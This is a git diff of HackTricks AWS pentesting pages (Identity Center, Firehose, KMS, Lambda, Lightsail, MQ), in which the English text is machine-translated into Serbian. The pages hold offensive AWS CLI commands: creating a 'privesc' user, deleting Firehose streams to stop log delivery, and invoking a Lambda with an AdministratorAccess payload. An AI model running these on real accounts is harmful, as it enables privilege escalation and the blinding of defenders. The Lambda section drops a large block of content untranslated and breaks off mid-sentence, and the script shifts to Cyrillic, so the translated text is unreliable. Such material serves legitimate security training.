 aws identitystore create-user --identity-store-id  --user-name privesc --display-name privesc --emails Value=sdkabflvwsljyclpma@tmmbt.net,Type=Work,Primary=True --name Formatted=privesc,FamilyName=privesc,GivenName=privesc
 ## After creating it try to login in the console using the selected username, you will receive an email with the code and then you will be able to select a password
 ```
+- Kreirajte grupu i dodelite joj dozvole i postavite kontrolisanog korisnika
+- Dajte dodatne dozvole kontrolisanom korisniku ili grupi
+- Po defaultu, samo korisnici sa dozvolama iz Upravljčkog naloga će moći da pristupaju i kontrolišu IAM Identity Center.
 
-- Create a group and assign it permissions and set on it a controlled user
-- Give extra permissions to a controlled user or group
-- By default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center.
-
-  However, it's possible via Delegate Administrator to allow users from a different account to manage it. They won't have exactly the same permission, but they will be able to perform [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html).
+Međutim, moguće je putem Delegiranog Administratora omogućiti korisnicima iz drugog naloga da njime upravljaju. Neće imati iste dozvole, ali će moći da obavljaju [**aktivnosti upravljanja**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html).
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md
index 6ca66b5ed..90eb8fcaf 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md
@@ -4,12 +4,11 @@
 
 ## Kinesis Data Firehose
 
-Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints.
+Amazon Kinesis Data Firehose je **potpuno upravljana usluga** koja olakšava isporuku **podataka u realnom vremenu**. Podržava razne destinacije, uključujući Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk i prilagođene HTTP krajnje tačke.
 
-The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases.
+Usluga smanjuje potrebu za pisanjem aplikacija ili upravljanjem resursima omogućavajući proizvođačima podataka da budu konfigurisani da direktno prosleđuju podatke Kinesis Data Firehose. Ova usluga je odgovorna za **automatsku isporuku podataka na određenu destinaciju**. Pored toga, Kinesis Data Firehose pruža opciju da **transformiše podatke pre njihove isporuke**, povećavajući svoju fleksibilnost i primenljivost na različite slučajeve upotrebe.
 
 ### Enumeration
-
 ```bash
 # Get delivery streams
 aws firehose list-delivery-streams
@@ -19,37 +18,26 @@ aws firehose describe-delivery-stream --delivery-stream-name 
 ## Get roles
 aws firehose describe-delivery-stream --delivery-stream-name  | grep -i RoleARN
 ```
-
 ## Post-exploitation / Defense Bypass
 
-In case firehose is used to send logs or defense insights, using these functionalities an attacker could prevent it from working properly.
+U slučaju da se firehose koristi za slanje logova ili uvida u odbranu, koristeći ove funkcionalnosti, napadač bi mogao sprečiti njegovo pravilno funkcionisanje.
 
 ### firehose:DeleteDeliveryStream
-
 ```
 aws firehose delete-delivery-stream --delivery-stream-name  --allow-force-delete
 ```
-
 ### firehose:UpdateDestination
-
 ```
 aws firehose update-destination --delivery-stream-name  --current-delivery-stream-version-id  --destination-id 
 ```
-
 ### firehose:PutRecord | firehose:PutRecordBatch
-
 ```
 aws firehose put-record --delivery-stream-name my-stream --record '{"Data":"SGVsbG8gd29ybGQ="}'
 
 aws firehose put-record-batch --delivery-stream-name my-stream --records file://records.json
 ```
-
 ## References
 
 - [https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html](https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md
index 543ed31cd..833e98dc8 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md
@@ -2,128 +2,125 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## KMS - Key Management Service
+## KMS - Usluga upravljanja ključevima
 
-AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys.
+AWS Usluga upravljanja ključevima (AWS KMS) se predstavlja kao upravljana usluga, pojednostavljujući proces za korisnike da **kreiraju i upravljaju glavnim ključevima kupca** (CMK). Ovi CMK-ovi su ključni za enkripciju korisničkih podataka. Značajna karakteristika AWS KMS-a je da su CMK-ovi pretežno **zaštićeni hardverskim bezbednosnim modulima** (HSM), što poboljšava zaštitu enkripcijskih ključeva.
 
-KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**.
+KMS koristi **simetričnu kriptografiju**. Ovo se koristi za **enkripciju informacija u mirovanju** (na primer, unutar S3). Ako treba da **enkriptuješ informacije u prenosu**, moraš koristiti nešto poput **TLS**.
 
-KMS is a **region specific service**.
+KMS je **usluga specifična za region**.
 
-**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used.
+**Administratori u Amazonu nemaju pristup tvojim ključevima**. Ne mogu da povrate tvoje ključeve i ne pomažu ti u enkripciji tvojih ključeva. AWS jednostavno upravlja operativnim sistemom i osnovnom aplikacijom, a na nama je da upravljamo našim enkripcijskim ključevima i upravljamo kako se ti ključevi koriste.
 
-**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data.
+**Glavni ključevi kupca** (CMK): Mogu enkriptovati podatke do 4KB veličine. Obično se koriste za kreiranje, enkripciju i dekripciju DEK-ova (Ključevi za enkripciju podataka). Zatim se DEK-ovi koriste za enkripciju podataka.
 
-A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK.
+Glavni ključ kupca (CMK) je logička reprezentacija glavnog ključa u AWS KMS-u. Pored identifikatora glavnog ključa i drugih metapodataka, uključujući datum kreiranja, opis i stanje ključa, **CMK sadrži materijal ključa koji se koristi za enkripciju i dekripciju podataka**. Kada kreiraš CMK, po defaultu, AWS KMS generiše materijal ključa za taj CMK. Međutim, možeš izabrati da kreiraš CMK bez materijala ključa i zatim uvezeš svoj materijal ključa u taj CMK.
 
-There are 2 types of master keys:
+Postoje 2 tipa glavnih ključeva:
 
-- **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it.
-- **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys.
+- **AWS upravljani CMK-ovi: Koriste ih druge usluge za enkripciju podataka**. Koristi ih usluga koja ih je kreirala u regionu. Kreiraju se prvi put kada implementiraš enkripciju u toj usluzi. Rotira se svake 3 godine i nije moguće promeniti ga.
+- **CMK-ovi koje upravlja kupac**: Fleksibilnost, rotacija, konfigurisani pristup i politika ključeva. Omogućavanje i onemogućavanje ključeva.
 
-**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**.
+**Enkripcija u omotu** u kontekstu Usluge upravljanja ključevima (KMS): Dvostepeni hijerarhijski sistem za **enkripciju podataka sa ključem podataka i zatim enkripciju ključa podataka sa glavnim ključem**.
 
-### Key Policies
+### Politike ključeva
 
-These defines **who can use and access a key in KMS**.
+Ove definišu **ko može koristiti i pristupati ključu u KMS-u**.
 
-By **default:**
+Po **defaultu:**
 
-- It gives the **IAM of the** **AWS account that owns the KMS key access** to manage the access to the KMS key via IAM.
+- Daje **IAM-u** **AWS naloga koji poseduje KMS ključ pristup** za upravljanje pristupom KMS ključu putem IAM-a.
 
-  Unlike other AWS resource policies, a AWS **KMS key policy does not automatically give permission any of the principals of the account**. To give permission to account administrators, the **key policy must include an explicit statement** that provides this permission, like this one.
+Za razliku od drugih politika resursa AWS-a, politika **KMS ključa ne daje automatski dozvolu nijednom od principala naloga**. Da bi se dala dozvola administratorima naloga, **politika ključa mora uključivati eksplicitnu izjavu** koja pruža ovu dozvolu, poput ove.
 
-  - Without allowing the account(`"AWS": "arn:aws:iam::111122223333:root"`) IAM permissions won't work.
+- Bez omogućavanja naloga(`"AWS": "arn:aws:iam::111122223333:root"`) IAM dozvole neće raditi.
 
-- It **allows the account to use IAM policies** to allow access to the KMS key, in addition to the key policy.
+- **Omogućava nalogu da koristi IAM politike** za omogućavanje pristupa KMS ključu, pored politike ključa.
 
-  **Without this permission, IAM policies that allow access to the key are ineffective**, although IAM policies that deny access to the key are still effective.
+**Bez ove dozvole, IAM politike koje omogućavaju pristup ključu su neefikasne**, iako su IAM politike koje negiraju pristup ključu i dalje efikasne.
 
-- It **reduces the risk of the key becoming unmanageable** by giving access control permission to the account administrators, including the account root user, which cannot be deleted.
-
-**Default policy** example:
+- **Smanjuje rizik da ključ postane neuredan** dajući dozvolu za kontrolu pristupa administratorima naloga, uključujući korisnika root naloga, koji ne može biti obrisan.
 
+**Primer default politike**:
 ```json
 {
-  "Sid": "Enable IAM policies",
-  "Effect": "Allow",
-  "Principal": {
-    "AWS": "arn:aws:iam::111122223333:root"
-  },
-  "Action": "kms:*",
-  "Resource": "*"
+"Sid": "Enable IAM policies",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::111122223333:root"
+},
+"Action": "kms:*",
+"Resource": "*"
 }
 ```
-
 > [!WARNING]
-> If the **account is allowed** (`"arn:aws:iam::111122223333:root"`) a **principal** from the account **will still need IAM permissions** to use the KMS key. However, if the **ARN** of a role for example is **specifically allowed** in the **Key Policy**, that role **doesn't need IAM permissions**.
+> Ako je **nalog dozvoljen** (`"arn:aws:iam::111122223333:root"`), **principal** iz naloga **će i dalje trebati IAM dozvole** da koristi KMS ključ. Međutim, ako je **ARN** uloge, na primer, **specifično dozvoljen** u **Politici ključeva**, ta uloga **ne treba IAM dozvole**.
 
 

 
-Policy Details
+Detalji politike
 
-Properties of a policy:
+Osobine politike:
 
-- JSON based document
-- Resource --> Affected resources (can be "\*")
-- Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions)
-- Effect --> Allow/Deny
-- Principal --> arn affected
-- Conditions (optional) --> Condition to give the permissions
+- Dokument zasnovan na JSON-u
+- Resurs --> Pogođeni resursi (može biti "\*")
+- Akcija --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (dozvole)
+- Efekat --> Dozvoli/Onemogući
+- Principal --> arn pogođen
+- Uslovi (opciono) --> Uslov za davanje dozvola
 
-Grants:
+Grantovi:
 
-- Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...)
-- After the grant is created a GrantToken and a GratID are issued
+- Dozvoljava delegiranje vaših dozvola drugom AWS principalu unutar vašeg AWS naloga. Morate ih kreirati koristeći AWS KMS API-je. Može se navesti identifikator CMK, principal koji dobija grant i potrebni nivo operacije (Decrypt, Encrypt, GenerateDataKey...)
+- Nakon što je grant kreiran, izdaju se GrantToken i GrantID
 
-**Access**:
+**Pristup**:
 
-- Via **key policy** -- If this exist, this takes **precedent** over the IAM policy
-- Via **IAM policy**
-- Via **grants**
+- Putem **politike ključeva** -- Ako ovo postoji, ovo ima **prioritet** nad IAM politikom
+- Putem **IAM politike**
+- Putem **grantova**
 
 

 
-### Key Administrators
+### Administratori ključeva
 
-Key administrator by default:
+Administrator ključeva po defaultu:
 
-- Have access to manage KMS but not to encrypt or decrypt data
-- Only IAM users and roles can be added to Key Administrators list (not groups)
-- If external CMK is used, Key Administrators have the permission to import key material
+- Ima pristup za upravljanje KMS-om, ali ne i za enkripciju ili dekripciju podataka
+- Samo IAM korisnici i uloge mogu biti dodati na listu administratora ključeva (ne grupe)
+- Ako se koristi eksterni CMK, administratori ključeva imaju dozvolu da uvezu materijal ključa
 
-### Rotation of CMKs
+### Rotacija CMK-ova
 
-- The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases.
-- **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed.
-- **Older keys are retained** to decrypt data that was encrypted prior to the rotation
-- In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**.
-- If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled.
+- Što duže isti ključ ostane na mestu, to više podataka se enkriptuje tim ključem, i ako taj ključ bude kompromitovan, šira oblast podataka je u riziku. Pored toga, što duže ključ bude aktivan, verovatnoća da će biti kompromitovan raste.
+- **KMS rotira korisničke ključeve svake 365 dana** (ili možete izvršiti proces ručno kad god želite) i **ključevi koje upravlja AWS svake 3 godine** i ovaj put se ne može promeniti.
+- **Stariji ključevi se čuvaju** za dekripciju podataka koji su enkriptovani pre rotacije
+- U slučaju kompromitacije, rotacija ključa neće ukloniti pretnju jer će biti moguće dekriptovati sve podatke enkriptovane kompromitovanim ključem. Međutim, **novi podaci će biti enkriptovani novim ključem**.
+- Ako je **CMK** u stanju **onemogućen** ili **na čekanju** **brisanja**, KMS **neće izvršiti rotaciju ključa** dok se CMK ponovo ne omogući ili brisanje ne otkaže.
 
-#### Manual rotation
+#### Ručna rotacija
 
-- A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID.
-- To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to.
-- You need to **keep old keys to decrypt old files** encrypted with it.
+- **Novi CMK treba da bude kreiran**, zatim se kreira novi CMK-ID, tako da ćete morati da **ažurirate** svaku **aplikaciju** da **referencira** novi CMK-ID.
+- Da biste ovaj proces olakšali, možete **koristiti alias za referenciranje ID ključa** i zatim samo ažurirati ključ na koji alias se odnosi.
+- Morate **čuvati stare ključeve za dekripciju starih fajlova** enkriptovanih tim ključem.
 
-You can import keys from your on-premises key infrastructure .
+Možete uvesti ključeve iz vaše lokalne infrastrukture ključeva.
 
-### Other relevant KMS information
+### Druge relevantne KMS informacije
 
-KMS is priced per number of encryption/decryption requests received from all services per month.
+KMS se naplaćuje po broju zahteva za enkripciju/dekripciju primljenih od svih usluga mesečno.
 
-KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS.
+KMS ima potpunu reviziju i usklađenost **integraciju sa CloudTrail**; ovde možete revizirati sve promene izvršene na KMS-u.
 
-With KMS policy you can do the following:
+Sa KMS politikom možete učiniti sledeće:
 
-- Limit who can create data keys and which services have access to use these keys
-- Limit systems access to encrypt only, decrypt only or both
-- Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions).
+- Ograničiti ko može kreirati ključeve podataka i koje usluge imaju pristup korišćenju ovih ključeva
+- Ograničiti pristup sistemima samo za enkripciju, samo za dekripciju ili oboje
+- Definisati da omogućite sistemima pristup ključevima širom regiona (iako se ne preporučuje jer će kvar u regionu koji hostuje KMS uticati na dostupnost sistema u drugim regionima).
 
-You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region.
-
-### Enumeration
+Ne možete sinhronizovati ili premestiti/kopirati ključeve između regiona; možete samo definisati pravila za omogućavanje pristupa između regiona.
 
+### Enumeracija
 ```bash
 aws kms list-keys
 aws kms list-key-policies --key-id 
@@ -132,7 +129,6 @@ aws kms describe-key --key-id 
 aws kms get-key-policy --key-id  --policy-name  # Default policy name is "default"
 aws kms describe-custom-key-stores
 ```
-
 ### Privesc
 
 {{#ref}}
@@ -156,7 +152,3 @@ aws kms describe-custom-key-stores
 - [https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md
index 03fa1aac8..6652e857f 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md
@@ -4,59 +4,9 @@
 
 ## Lambda
 
-Amazon Web Services (AWS) Lambda is described as a **compute service** that enables the execution of code without the necessity for server provision or management. It is characterized by its ability to **automatically handle resource allocation** needed for code execution, ensuring features like high availability, scalability, and security. A significant aspect of Lambda is its pricing model, where **charges are based solely on the compute time utilized**, eliminating the need for initial investments or long-term obligations.
-
-To call a lambda it's possible to call it as **frequently as you wants** (with Cloudwatch), **expose** an **URL** endpoint and call it, call it via **API Gateway** or even based on **events** such as **changes** to data in a **S3** bucket or updates to a **DynamoDB** table.
-
-The **code** of a lambda is stored in **`/var/task`**.
-
-### Lambda Aliases Weights
-
-A Lambda can have **several versions**.\
-And it can have **more than 1** version exposed via **aliases**. The **weights** of **each** of the **versions** exposed inside and alias will decide **which alias receive the invocation** (it can be 90%-10% for example).\
-If the code of **one** of the aliases is **vulnerable** you can send **requests until the vulnerable** versions receives the exploit.
-
-![](<../../../images/image (223).png>)
-
-### Resource Policies
-
-Lambda resource policies allow to **give access to other services/accounts to invoke** the lambda for example.\
-For example this is the policy to allow **anyone to access a lambda exposed via URL**:
-
-

-
-Or this to allow an API Gateway to invoke it:
-
-

-
-### Lambda Database Proxies
-
-When there are **hundreds** of **concurrent lambda requests**, if each of them need to **connect and close a connection to a database**, it's just not going to work (lambdas are stateless, cannot maintain connections open).\
-Then, if your **Lambda functions interact with RDS Proxy instead** of your database instance. It handles the connection pooling necessary for scaling many simultaneous connections created by concurrent Lambda functions. This allows your Lambda applications to **reuse existing connections**, rather than creating new connections for every function invocation.
-
-### Lambda EFS Filesystems
-
-To preserve and even share data **Lambdas can access EFS and mount them**, so Lambda will be able to read and write from it.
-
-### Lambda Layers
-
-A Lambda _layer_ is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files.
-
-It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment.
-
-By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version.
-
-Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image.
-
-### Lambda Extensions
-
-Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**.
-
-- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**.
-- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**.
-
-### Enumeration
+Amazon Web Services (AWS) Lambda se opisuje kao **računarska usluga** koja omogućava izvršavanje koda bez potrebe za obezbeđivanjem ili upravljanjem serverima. Karakteriše se sposobnošću da **automatski upravlja alokacijom resursa** potrebnih za izvršavanje koda, obezbeđujući funkcije kao što su visoka dostupnost, skalabilnost i sigurnost. Značajan aspekt Lambda je njen model cena, gde se **naplaćuje isključivo na osnovu vremena obrade** koje se koristi, eliminišući potrebu za inicijalnim ulaganjima ili dugoročnim obavezama.
 
+Da biste pozvali lambda, moguće je pozvati je **onoliko često koliko želite** (sa Cloudwatch), **izložiti
 ```bash
 aws lambda get-account-settings
 
@@ -93,11 +43,9 @@ aws lambda list-event-source-mappings
 aws lambda list-code-signing-configs
 aws lambda list-functions-by-code-signing-config --code-signing-config-arn 
 ```
+### Pozivanje lambda
 
-### Invoke a lambda
-
-#### Manual
-
+#### Ručno
 ```bash
 # Invoke function
 aws lambda invoke --function-name FUNCTION_NAME /tmp/out
@@ -106,83 +54,70 @@ aws lambda invoke --function-name FUNCTION_NAME /tmp/out
 ## user_name = event['user_name']
 aws lambda invoke --function-name  --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess], "user_name": "sdf"}' out.txt
 ```
-
-#### Via exposed URL
-
+#### Putem izloženog URL-a
 ```bash
 aws lambda list-function-url-configs --function-name  #Get lambda URL
 aws lambda get-function-url-config   --function-name  #Get lambda URL
 ```
+#### Pozivanje Lambda funkcije putem URL-a
 
-#### Call Lambda function via URL
-
-Now it's time to find out possible lambda functions to execute:
-
+Sada je vreme da otkrijemo moguće lambda funkcije za izvršavanje:
 ```
 aws --region us-west-2 --profile level6 lambda list-functions
 ```
-
 ![](<../../../images/image (262).png>)
 
-A lambda function called "Level6" is available. Lets find out how to call it:
-
+Lambda funkcija pod nazivom "Level6" je dostupna. Hajde da saznamo kako da je pozovemo:
 ```bash
 aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6
 ```
-
 ![](<../../../images/image (102).png>)
 
-Now, that you know the name and the ID you can get the Name:
-
+Sada, kada znate ime i ID, možete dobiti Ime:
 ```bash
 aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
 ```
-
 ![](<../../../images/image (237).png>)
 
-And finally call the function accessing (notice that the ID, Name and function-name appears in the URL): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6)
+I konačno pozovite funkciju pristupajući (primetite da se ID, Ime i naziv funkcije pojavljuju u URL-u): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6)
 
 `URL:`**`https://.execute-api..amazonaws.com//`**
 
-#### Other Triggers
+#### Ostali Okidači
 
-There are a lot of other sources that can trigger a lambda
+Postoji mnogo drugih izvora koji mogu pokrenuti lambda
 
 

 
 ### Privesc
 
-In the following page you can check how to **abuse Lambda permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite Lambda dozvole za eskalaciju privilegija**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-lambda-privesc.md
 {{#endref}}
 
-### Unauthenticated Access
+### Neautentifikovani Pristup
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md
 {{#endref}}
 
-### Post Exploitation
+### Post Eksploatacija
 
 {{#ref}}
 ../aws-post-exploitation/aws-lambda-post-exploitation/
 {{#endref}}
 
-### Persistence
+### Persistencija
 
 {{#ref}}
 ../aws-persistence/aws-lambda-persistence/
 {{#endref}}
 
-## References
+## Reference
 
 - [https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer](https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer)
 - [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md
index 9f5ccb1ab..07827c93c 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md
@@ -4,11 +4,10 @@
 
 ## AWS - Lightsail
 
-Amazon Lightsail provides an **easy**, lightweight way for new cloud users to take advantage of AWS’ cloud computing services. It allows you to deploy common and custom web services in seconds via **VMs** (**EC2**) and **containers**.\
-It's a **minimal EC2 + Route53 + ECS**.
+Amazon Lightsail pruža **laku**, laganu opciju za nove korisnike u oblaku da iskoriste AWS-ove usluge računarstva u oblaku. Omogućava vam da implementirate uobičajene i prilagođene veb usluge za nekoliko sekundi putem **VM-ova** (**EC2**) i **kontejnera**.\
+To je **minimalni EC2 + Route53 + ECS**.
 
 ### Enumeration
-
 ```bash
 # Instances
 aws lightsail get-instances #Get all
@@ -29,14 +28,13 @@ aws lightsail get-load-balancers
 aws lightsail get-static-ips
 aws lightsail get-key-pairs
 ```
+### Анализа Снепшотов
 
-### Analyse Snapshots
+Могуће је генерисати **инстанце и релационе базе података снепшотове из lightsail**. Стога можете проверити те на исти начин на који можете проверити [**EC2 снепшотове**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) и [**RDS снепшотове**](aws-relational-database-rds-enum.md#enumeration).
 
-It's possible to generate **instance and relational database snapshots from lightsail**. Therefore you can check those the same way you can check [**EC2 snapshots**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) and [**RDS snapshots**](aws-relational-database-rds-enum.md#enumeration).
+### Мета подаци
 
-### Metadata
-
-**Metadata endpoint is accessible from lightsail**, but the machines are running in an **AWS account managed by AWS** so you don't control **what permissions are being granted**. However, if you find a way to exploit those you would be directly exploiting AWS.
+**Мета подаци ендпоинт је доступан из lightsail**, али машине раде у **AWS налогу који управља AWS** тако да не контролишете **које дозволе су додељене**. Међутим, ако пронађете начин да искористите те, директно бисте искористили AWS.
 
 ### Privesc
 
@@ -57,7 +55,3 @@ It's possible to generate **instance and relational database snapshots from ligh
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md
index 8504db545..f6469894c 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md
@@ -4,28 +4,27 @@
 
 ## Amazon MQ
 
-### Introduction to Message Brokers
+### Uvod u posrednike poruka
 
-**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates.
+**Posrednici poruka** služe kao posrednici, olakšavajući komunikaciju između različitih softverskih sistema, koji mogu biti izgrađeni na različitim platformama i programirani na različitim jezicima. **Amazon MQ** pojednostavljuje implementaciju, rad i održavanje posrednika poruka na AWS-u. Pruža upravljane usluge za **Apache ActiveMQ** i **RabbitMQ**, osiguravajući besprekornu nabavku i automatske nadogradnje verzija softvera.
 
 ### AWS - RabbitMQ
 
-RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers.
+RabbitMQ je istaknuti **softver za redove poruka**, poznat i kao _posrednik poruka_ ili _menadžer redova_. U suštini, to je sistem u kojem su redovi konfigurisani. Aplikacije komuniciraju sa ovim redovima da bi **slale i primale poruke**. Poruke u ovom kontekstu mogu nositi razne informacije, od komandi za pokretanje procesa na drugim aplikacijama (potencijalno na različitim serverima) do jednostavnih tekstualnih poruka. Poruke drži softver menadžera redova dok ih ne preuzme i obradi aplikacija koja prima. AWS pruža jednostavno rešenje za hostovanje i upravljanje RabbitMQ serverima.
 
 ### AWS - ActiveMQ
 
-Apache ActiveMQ® is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can:
+Apache ActiveMQ® je vodeći open-source, Java-bazirani **posrednik poruka** poznat po svojoj svestranosti. Podržava više industrijskih standardnih protokola, nudeći široku kompatibilnost klijenata kroz razne jezike i platforme. Korisnici mogu:
 
-- Connect with clients written in JavaScript, C, C++, Python, .Net, and more.
-- Leverage the **AMQP** protocol to integrate applications from different platforms.
-- Use **STOMP** over websockets for web application message exchanges.
-- Manage IoT devices with **MQTT**.
-- Maintain existing **JMS** infrastructure and extend its capabilities.
+- Povezati se sa klijentima napisanim u JavaScript-u, C-u, C++, Python-u, .Net-u i drugim.
+- Iskoristiti **AMQP** protokol za integraciju aplikacija sa različitih platformi.
+- Koristiti **STOMP** preko websockets za razmenu poruka u web aplikacijama.
+- Upravljati IoT uređajima sa **MQTT**.
